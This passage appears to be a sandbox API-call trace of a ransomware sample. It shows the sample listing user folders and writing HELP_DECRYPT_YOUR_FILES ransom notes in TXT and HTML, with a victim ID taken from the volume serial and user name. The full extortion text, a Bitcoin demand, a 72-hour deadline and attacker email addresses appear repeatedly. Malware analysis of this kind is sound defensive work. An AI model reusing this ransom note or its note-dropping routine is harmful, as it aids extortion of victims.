	[0179.666] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x849be8cf, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x849be8cf, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x849be8cf, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0179.666] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84998969, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84998969, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x849be8cf, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0179.666] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d527734, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1
	[0179.666] lstrcmpW (lpString1="My Music", lpString2="..") returned 1
	[0179.666] lstrcmpW (lpString1="My Music", lpString2=".") returned 1
	[0179.666] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\Default\\Documents" | out: lpString1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents"
	[0179.666] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\") returned="C:\\Users\\Default\\Documents\\"
	[0179.667] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="My Music" | out: lpString1="C:\\Users\\Default\\Documents\\My Music") returned="C:\\Users\\Default\\Documents\\My Music"
	[0179.667] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\Default\\Documents\\My Music" | out: lpString1="C:\\Users\\Default\\Documents\\My Music") returned="C:\\Users\\Default\\Documents\\My Music"
	[0179.667] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Music", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Music\\") returned="C:\\Users\\Default\\Documents\\My Music\\"
	[0179.667] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\Default\\Documents\\My Music\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Music\\") returned="C:\\Users\\Default\\Documents\\My Music\\"
	[0179.667] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Music\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Documents\\My Music\\*.*") returned="C:\\Users\\Default\\Documents\\My Music\\*.*"
	[0179.667] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Music\\*.*" (normalized: "c:\\users\\default\\documents\\my music\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="shell32.dll")) returned 0xffffffff
	[0179.668] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0179.668] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\Default\\Documents\\My Music" | out: lpString1="C:\\Users\\Default\\Documents\\My Music") returned="C:\\Users\\Default\\Documents\\My Music"
	[0179.668] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Music", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Documents\\My Music\\*.*") returned="C:\\Users\\Default\\Documents\\My Music\\*.*"
	[0179.668] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.668] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.668] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Default\\Documents\\My Music\\HELP_DECRYPT_YOUR_FILES.TXT") returned 63
	[0179.668] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Music\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\documents\\my music\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0179.670] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0179.671] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0179.683] CloseHandle (hObject=0x384) returned 1
	[0179.683] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.683] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.684] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0179.685] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0179.685] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Music\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\documents\\my music\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0179.685] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0179.686] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0179.686] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0179.686] CloseHandle (hObject=0x384) returned 1
	[0179.686] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.686] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.687] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0179.687] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Default\\Documents\\My Music\\HELP_DECRYPT_YOUR_FILES.HTML") returned 64
	[0179.687] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Music\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\documents\\my music\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0179.687] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0179.687] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0179.691] CloseHandle (hObject=0x384) returned 1
	[0179.692] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.692] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.693] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.693] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0179.694] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.694] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Music\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\documents\\my music\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0179.694] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0179.694] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.695] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0179.695] CloseHandle (hObject=0x384) returned 1
	[0179.695] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Music\\*.*" (normalized: "c:\\users\\default\\documents\\my music\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="shell32.dll")) returned 0xffffffff
	[0179.695] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0179.695] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d527734, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1
	[0179.695] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1
	[0179.695] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1
	[0179.696] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\Default\\Documents" | out: lpString1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents"
	[0179.696] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\") returned="C:\\Users\\Default\\Documents\\"
	[0179.696] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="My Pictures" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures") returned="C:\\Users\\Default\\Documents\\My Pictures"
	[0179.696] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\Default\\Documents\\My Pictures" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures") returned="C:\\Users\\Default\\Documents\\My Pictures"
	[0179.696] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Pictures", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\") returned="C:\\Users\\Default\\Documents\\My Pictures\\"
	[0179.696] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\Default\\Documents\\My Pictures\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\") returned="C:\\Users\\Default\\Documents\\My Pictures\\"
	[0179.696] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\*.*") returned="C:\\Users\\Default\\Documents\\My Pictures\\*.*"
	[0179.696] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\*.*" (normalized: "c:\\users\\default\\documents\\my pictures\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="shell32.dll")) returned 0xffffffff
	[0179.697] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0179.697] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\Default\\Documents\\My Pictures" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures") returned="C:\\Users\\Default\\Documents\\My Pictures"
	[0179.697] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Pictures", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\*.*") returned="C:\\Users\\Default\\Documents\\My Pictures\\*.*"
	[0179.697] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.697] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.697] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Default\\Documents\\My Pictures\\HELP_DECRYPT_YOUR_FILES.TXT") returned 66
	[0179.697] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\documents\\my pictures\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0179.698] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0179.698] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0179.701] CloseHandle (hObject=0x384) returned 1
	[0179.701] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.702] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.702] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0179.703] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0179.703] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\documents\\my pictures\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0179.703] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0179.703] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0179.703] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0179.704] CloseHandle (hObject=0x384) returned 1
	[0179.704] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.704] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.705] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0179.705] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Default\\Documents\\My Pictures\\HELP_DECRYPT_YOUR_FILES.HTML") returned 67
	[0179.705] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\documents\\my pictures\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0179.707] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0179.707] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0179.711] CloseHandle (hObject=0x384) returned 1
	[0179.711] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.711] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.712] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.712] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0179.727] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.727] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\documents\\my pictures\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0179.728] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0179.728] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.728] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0179.729] CloseHandle (hObject=0x384) returned 1
	[0179.729] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\*.*" (normalized: "c:\\users\\default\\documents\\my pictures\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="shell32.dll")) returned 0xffffffff
	[0179.729] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
